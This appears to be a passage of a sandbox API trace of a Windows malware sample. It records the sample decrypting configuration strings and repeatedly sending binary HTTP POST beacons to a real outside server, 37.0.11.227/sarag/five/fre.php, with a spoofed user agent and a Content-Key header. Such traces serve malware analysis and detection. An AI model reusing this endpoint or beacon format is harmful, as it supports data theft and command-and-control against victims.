[0288.803] GetProcessHeap () returned 0x690000 [0288.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0288.803] GetProcessHeap () returned 0x690000 [0288.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0288.804] GetProcessHeap () returned 0x690000 [0288.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0288.804] GetProcessHeap () returned 0x690000 [0288.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0288.805] closesocket (s=0x94c) returned 0 [0288.805] GetProcessHeap () returned 0x690000 [0288.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0288.805] GetProcessHeap () returned 0x690000 [0288.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.806] GetProcessHeap () returned 0x690000 [0288.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0288.806] GetProcessHeap () returned 0x690000 [0288.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0288.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17b0) returned 0x94c [0288.808] Sleep (dwMilliseconds=0xea60) [0288.809] GetProcessHeap () returned 0x690000 [0288.809] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0288.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.810] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0288.890] GetProcessHeap () returned 0x690000 [0288.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0288.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.891] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.892] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0289.024] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.024] GetProcessHeap () returned 0x690000 [0289.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0289.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0289.027] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0289.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0289.031] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0289.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0289.032] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0289.032] GetProcessHeap () returned 0x690000 [0289.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0289.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0289.032] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0289.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0289.033] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0289.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0289.034] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0289.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0289.035] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0289.035] GetProcessHeap () returned 0x690000 [0289.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0289.035] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0289.035] GetProcessHeap () returned 0x690000 [0289.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0289.036] GetProcessHeap () returned 0x690000 [0289.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0289.038] GetProcessHeap () returned 0x690000 [0289.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0289.038] GetProcessHeap () returned 0x690000 [0289.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0289.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0289.039] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.332] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0291.340] GetProcessHeap () returned 0x690000 [0291.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0291.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.340] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0291.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.344] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.345] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.345] GetProcessHeap () returned 0x690000 [0291.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0291.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.349] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0291.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.353] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0291.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.354] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0291.354] GetProcessHeap () returned 0x690000 [0291.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0291.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.355] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0291.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.356] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0291.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.356] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0291.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.357] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0291.357] GetProcessHeap () returned 0x690000 [0291.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0291.366] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0291.366] GetProcessHeap () returned 0x690000 [0291.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0291.366] socket (af=2, type=1, protocol=6) returned 0x950 [0291.366] connect (s=0x950, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0291.391] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0291.391] GetProcessHeap () returned 0x690000 [0291.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0291.391] GetProcessHeap () returned 0x690000 [0291.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0291.392] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0291.392] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0291.392] GetProcessHeap () returned 0x690000 [0291.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0291.392] GetProcessHeap () returned 0x690000 [0291.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0291.394] GetProcessHeap () returned 0x690000 [0291.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0291.394] GetProcessHeap () returned 0x690000 [0291.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0291.397] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0291.400] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0291.401] GetProcessHeap () returned 0x690000 [0291.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0291.401] GetProcessHeap () returned 0x690000 [0291.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0291.402] send (s=0x950, buf=0x6ad508*, len=242, flags=0) returned 242 [0291.403] send (s=0x950, buf=0x6aba40*, len=159, flags=0) returned 159 [0291.403] GetProcessHeap () returned 0x690000 [0291.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0291.403] recv (in: s=0x950, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0291.470] GetProcessHeap () returned 0x690000 [0291.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0291.471] GetProcessHeap () returned 0x690000 [0291.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0291.471] GetProcessHeap () returned 0x690000 [0291.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0291.472] GetProcessHeap () returned 0x690000 [0291.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0291.472] closesocket (s=0x950) returned 0 [0291.472] GetProcessHeap () returned 0x690000 [0291.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0291.473] GetProcessHeap () returned 0x690000 [0291.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0291.473] GetProcessHeap () returned 0x690000 [0291.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0291.473] GetProcessHeap () returned 0x690000 [0291.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0291.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17b4) returned 0x950 [0291.484] Sleep (dwMilliseconds=0xea60) [0291.485] GetProcessHeap () returned 0x690000 [0291.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0291.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.491] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0291.652] GetProcessHeap () returned 0x690000 [0291.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0291.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.653] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0291.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.654] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.655] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.655] GetProcessHeap () returned 0x690000 [0291.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0291.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.656] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0291.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.658] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0291.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.659] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0291.659] GetProcessHeap () returned 0x690000 [0291.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0291.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.660] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.666] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.667] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.668] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.668] GetProcessHeap () returned 0x690000 [0291.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0291.668] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0291.668] GetProcessHeap () returned 0x690000 [0291.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0291.669] GetProcessHeap () returned 0x690000 [0291.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0291.669] GetProcessHeap () returned 0x690000 [0291.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0291.669] GetProcessHeap () returned 0x690000 [0291.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0291.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.743] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0291.774] GetProcessHeap () returned 0x690000 [0291.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0291.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.775] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0291.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.776] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.777] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.777] GetProcessHeap () returned 0x690000 [0291.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0291.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.867] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0291.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.867] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0291.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0291.868] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0291.868] GetProcessHeap () returned 0x690000 [0291.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0291.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.903] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0291.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.904] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0291.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.905] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0291.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.906] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0291.906] GetProcessHeap () returned 0x690000 [0291.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0291.906] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0291.906] GetProcessHeap () returned 0x690000 [0291.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0291.906] socket (af=2, type=1, protocol=6) returned 0x954 [0291.907] connect (s=0x954, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0291.943] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0291.943] GetProcessHeap () returned 0x690000 [0291.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0291.943] GetProcessHeap () returned 0x690000 [0291.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0291.944] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0291.944] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0291.944] GetProcessHeap () returned 0x690000 [0291.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0291.944] GetProcessHeap () returned 0x690000 [0291.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0291.983] GetProcessHeap () returned 0x690000 [0291.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0291.983] GetProcessHeap () returned 0x690000 [0291.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0291.983] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0291.984] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0291.984] GetProcessHeap () returned 0x690000 [0291.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0291.984] GetProcessHeap () returned 0x690000 [0291.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0291.984] send (s=0x954, buf=0x6ad508*, len=242, flags=0) returned 242 [0291.985] send (s=0x954, buf=0x6aba40*, len=159, flags=0) returned 159 [0291.985] GetProcessHeap () returned 0x690000 [0291.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0291.985] recv (in: s=0x954, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0292.064] GetProcessHeap () returned 0x690000 [0292.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0292.064] GetProcessHeap () returned 0x690000 [0292.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0292.065] GetProcessHeap () returned 0x690000 [0292.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0292.065] GetProcessHeap () returned 0x690000 [0292.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0292.065] closesocket (s=0x954) returned 0 [0292.066] GetProcessHeap () returned 0x690000 [0292.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0292.066] GetProcessHeap () returned 0x690000 [0292.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.067] GetProcessHeap () returned 0x690000 [0292.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0292.067] GetProcessHeap () returned 0x690000 [0292.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0292.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 